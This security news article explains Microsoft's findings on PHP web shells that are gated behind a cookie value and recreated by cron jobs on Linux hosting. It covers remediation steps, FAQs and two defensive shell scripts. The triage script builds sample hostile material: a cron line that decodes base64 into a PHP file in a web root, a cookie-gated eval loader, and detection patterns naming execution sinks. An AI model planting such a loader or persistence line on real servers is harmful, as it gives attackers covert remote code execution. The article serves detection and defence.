The Microsoft Defender Security Research Team has published detailed technical findings on an increasingly common threat to Linux web hosting environments: PHP web shells that use HTTP cookies as a hidden control channel and cron jobs for self-healing persistence. The technique is a notable evolution in web shell tradecraft because it separates persistence from activation into two independent mechanisms, which makes it resistant to the usual incident response step of deleting the offending file and hard to spot with signature-based tools. The web shell stays dormant under normal traffic and only activates when an attacker sends an HTTP request carrying a specific cookie value. That request is recorded in the access log like any other page hit, but common log formats do not record the Cookie header, so nothing in routine application logs marks it as malicious. Even when defenders find and delete the PHP file, a cron job recreates it on its next scheduled run.
Affected products
- Linux shared hosting environments running PHP web applications
- Hosting environments using cPanel, jailshell, or similar control panel platforms
- PHP applications served by Apache (mod_php or php-fpm) or by Nginx with php-fpm on Linux
- Any Linux web server where cron is available at the account level
How to Fix
Step-by-step remediation
Effective remediation has to address both halves of the attack, the cron job and the PHP loader, in the right order. Removing only the PHP loader without finding the cron job means the loader is recreated on the cron job's next scheduled run, possibly within minutes.

1. Audit cron. Run crontab -l as the web server account and as every hosting account user (on cPanel, the Cron Jobs page shows the same entries). Look for entries that decode base64, stage scripts from /tmp or similar locations, or write .php files into web directories. Record what you find for the investigation, then remove the suspicious entries with crontab -e before touching any files.
2. Find the loader. Search web-accessible directories for recently created or modified PHP files, for example with find filtered by modification time. Because an attacker can reset modification times with touch, also search file contents: look for PHP files that use the $_COOKIE superglobal in execution control logic (a cookie value gating eval, system or similar) rather than in ordinary session or preference handling. Copy anything suspicious off the host before deleting it so the payload can be analysed.
3. Rotate credentials. After removing both the cron job and the loader, change every credential tied to the hosting account: cPanel password, SSH keys, FTP credentials, and database passwords. Enable MFA on the hosting control panel immediately.
4. Monitor for recurrence. Alert on web server processes spawning shell interpreters; process ancestry showing php-fpm or apache2 spawning bash or dash is a high-signal indicator of web shell execution, and a cron job writing a PHP file into a web directory is another.
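The following triage script automates steps 1 and 2 above. It is an added example written for this article, not Microsoft's code or a hosting vendor tool. The cron heuristics, the execution-sink list and the sample crontab and PHP files it builds under a temporary directory are constructed assumptions for illustration, not indicators published in the research; the content-based PHP check is deliberately independent of file timestamps so that a touch-ed modification time does not hide the loader.

```shell
#!/bin/sh
# Triage helper added for this article; not Microsoft's code and not a vendor tool.
# It automates two of the remediation checks:
#   1. flag crontab lines shaped like a loader re-creator (base64 decoding,
#      staging from /tmp, or a redirect that writes a .php file into a web root)
#   2. list PHP files that reference $_COOKIE *and* an execution sink, which is
#      the cookie-gated shape rather than ordinary cookie/session handling
# Patterns, paths and the sample data below are assumptions constructed for
# illustration, not indicators published in the research.

# Read crontab text on stdin (e.g. `crontab -l | flag_cron_lines`) and print
# the lines that match any heuristic. Exits 0 even when nothing matches.
flag_cron_lines() {
    grep -E -i \
        -e 'base64' \
        -e '(^|[^A-Za-z0-9_])(/tmp|/var/tmp|/dev/shm)/' \
        -e '(echo|printf|cat|cp|curl|wget)[^#]*>[^#]*(public_html|www|htdocs|html)/[^#]*\.php' \
        -e 'php[[:space:]]+-r[[:space:]]' \
        || true
}

# Print every *.php under $1 that both reads $_COOKIE and calls a code or
# command execution function (or uses backtick execution). Content-based, so
# it is not defeated by `touch`-ing the file's modification time.
find_cookie_gated_php() {
    find "$1" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
        if grep -q '\$_COOKIE' "$f" && grep -Eq \
            -e '(^|[^A-Za-z0-9_])(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)[[:space:]]*\(' \
            -e '`' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# --- constructed sample data (not a real incident) ---------------------------
SAMPLE_CRON='MAILTO=""
0 3 * * * /home/acct/bin/backup.sh >/dev/null 2>&1
*/5 * * * * echo PD9waHAgLi4u | base64 -d > /home/acct/public_html/wp-includes/class-wp-cache.php
@hourly php /home/acct/public_html/cron.php'

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
mkdir -p "$SAMPLE_DIR/public_html/wp-includes"
# Benign: reads a cookie for a language preference and never executes anything.
cat > "$SAMPLE_DIR/public_html/session.php" <<'EOF'
<?php
$lang = isset($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en';
echo "lang=$lang";
EOF
# Cookie-gated shape: dormant for every request that lacks the expected cookie.
cat > "$SAMPLE_DIR/public_html/wp-includes/class-wp-cache.php" <<'EOF'
<?php
if (isset($_COOKIE['wp_cache_key']) && $_COOKIE['wp_cache_key'] === 'example-gate') {
    eval(base64_decode($_COOKIE['wp_cache_data']));
}
EOF

echo "== suspicious cron lines =="
printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines
echo "== cookie-gated PHP files =="
find_cookie_gated_php "$SAMPLE_DIR"
```

On a real account, feed `crontab -l` into flag_cron_lines and point find_cookie_gated_php at the document root; treat the output as a worklist to review, since legitimate plugins can also combine cookies with exec-style calls.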
What happened
Traditional PHP web shells expose their command execution through URL parameters or HTTP request bodies, which makes them detectable with standard web application firewall rules, log analysis, and file integrity monitoring. This technique takes a different approach that relies on a simple property of PHP: the $_COOKIE superglobal, which exposes the value of every cookie in the request to PHP code at runtime without any additional parsing or input handling. Threat actors deploy PHP loaders whose static code contains no obvious malicious functionality; the entire execution logic is gated behind a check of a cookie value. When a normal user or a security scanner visits the page, the loader does nothing. When the attacker sends a request carrying the expected cookie value, the web shell activates, processes commands, and can write secondary payloads to disk, all while the request looks like ordinary PHP execution in the web server logs, because the Cookie header is not part of the default access log formats. The gate keeps the shell's network footprint minimal, so it can remain undetected for extended periods. Microsoft noted that this behaviour extends beyond simple web requests to scheduled tasks and trusted background workers, creating multiple activation pathways that compound the detection challenge.
Real-World Impact
The implications are significant for any organisation running PHP applications on Linux hosting infrastructure. Shared hosting environments are particularly exposed because tenant isolation is only as strong as the account boundary: a compromised hosting account can be used to deploy web shells that affect every web property hosted under that account. The technique does not require root access, so it operates below the threshold of many server-level monitoring tools that focus on system-level changes. The persistent RCE channel gives attackers ongoing access to the compromised web application: the ability to read and modify web content, exfiltrate data the application processes, harvest credentials submitted through forms, inject malicious code into pages served to users, and use the server as a pivot point for further attacks on connected systems. Microsoft emphasised that the consistent reuse of cookie-based control across multiple observed implementations suggests established web shell tradecraft being shared across different threat actors rather than a technique unique to a single campaign.
🛡️ Prevention Tips
This is a classic living-off-the-land approach applied to Linux hosting infrastructure. The attacker uses no exotic tools; cron, base64, PHP and cPanel are standard components of any PHP hosting environment, so hash- or string-based detection has little to work with. Prevention therefore requires shifting from artefact-based to behaviour-based detection. Microsoft's guidance focuses on suspicious process ancestry (PHP processes spawning shell interpreters, cron jobs writing PHP files to web directories, base64 decoding initiated by web-facing processes) rather than on specific file hashes or known malicious strings. Credential hygiene is the first line of defence, since initial access often comes through valid credentials; MFA on hosting control panels directly addresses this. Restricting what web server processes can do, such as preventing php-fpm from spawning shell processes, limits what an attacker achieves even after initial access. Regular auditing of cron jobs across all hosting accounts should be a standard part of any Linux web hosting security programme. Monitoring that correlates web server process ancestry with file creation events in web directories provides the most reliable detection signal for this class of attack.
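The process-ancestry signal above can be checked from a plain ps snapshot. The sketch below is an added example written for this article, not Microsoft's detection logic: it reads the output of ps -eo pid,ppid,comm and reports every shell interpreter whose parent is a web server or PHP worker. The parent and child name lists are assumptions to extend for your stack, and the snapshot it runs on is constructed, not taken from a real host.

```shell
#!/bin/sh
# Added detection sketch for the process-ancestry signal; illustrative code
# written for this article, not Microsoft's detection logic.
# Input: output of `ps -eo pid,ppid,comm`. Output: one line per shell
# interpreter whose parent is a web server / PHP worker process.
# The process-name lists are assumptions; add your stack's names as needed.
flag_webserver_shells() {
    awk '
        NR == 1 { next }                       # skip the ps header
        { ppid[$1] = $2; comm[$1] = $3 }       # index every process by pid
        END {
            for (p in comm) {
                par = ppid[p]
                if (comm[p] ~ /^(sh|bash|dash|zsh|ksh)$/ && (par in comm) &&
                    comm[par] ~ /^(php-fpm|php-cgi|apache2|httpd|nginx|lsphp)/) {
                    printf "%s %s -> %s %s\n", par, comm[par], p, comm[p]
                }
            }
        }'
}

# Constructed snapshot (not from a real host): a php-fpm worker has spawned sh,
# which runs curl; cron and sshd also have shell children, which is normal.
SAMPLE_PS='  PID  PPID COMMAND
    1     0 systemd
  812     1 php-fpm7.4
  901   812 php-fpm7.4
  902   812 php-fpm7.4
  950   901 sh
  951   950 curl
 1100     1 cron
 1140  1100 sh
 1200     1 sshd
 1250  1200 bash'

printf '%s\n' "$SAMPLE_PS" | flag_webserver_shells
```

Run it live with `ps -eo pid,ppid,comm | flag_webserver_shells` from cron or a monitoring agent. Shells under cron are deliberately not flagged because cron legitimately runs shell jobs; the cron half of this technique is better caught by watching for PHP files being written into web directories, as described above.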
FAQs
How do I check if my Linux hosting account has a malicious cron job?
Run crontab -l to list the cron jobs registered for your current user (root can list another user's with crontab -u <user> -l, and cPanel shows the same entries on its Cron Jobs page). Look for any entry that references base64, contains long encoded strings, writes files to web-accessible directories, or runs scripts from /tmp/ or similar locations. Any cron entry you did not create yourself should be investigated immediately.
My hosting provider manages my Linux server — does this affect me?
Yes, if your website runs PHP on Linux hosting. This technique operates at the hosting account level, not the server level, and does not require root access. Any PHP website on shared or managed Linux hosting where the attacker has obtained your hosting account credentials is potentially affected.
I deleted the malicious PHP file but it keeps coming back — why?
This is the self-healing mechanism Microsoft documented. The PHP loader is being recreated by a cron job on a scheduled basis. Deleting only the PHP file without first removing the cron job means it will be recreated on the next execution cycle. Find and remove the cron job first using crontab -e, then delete the PHP file, then rotate your credentials.
Do I need to reinstall my entire server if I find this technique on my hosting account?
Not necessarily, but full remediation requires: removing the cron job, deleting the PHP loader, rotating all credentials, and auditing your web application files for any secondary payloads that may have been written by the activated web shell. If the web shell was active for an extended period, assume any data processed by your application during that time may have been compromised.
Last updated: April 4, 2026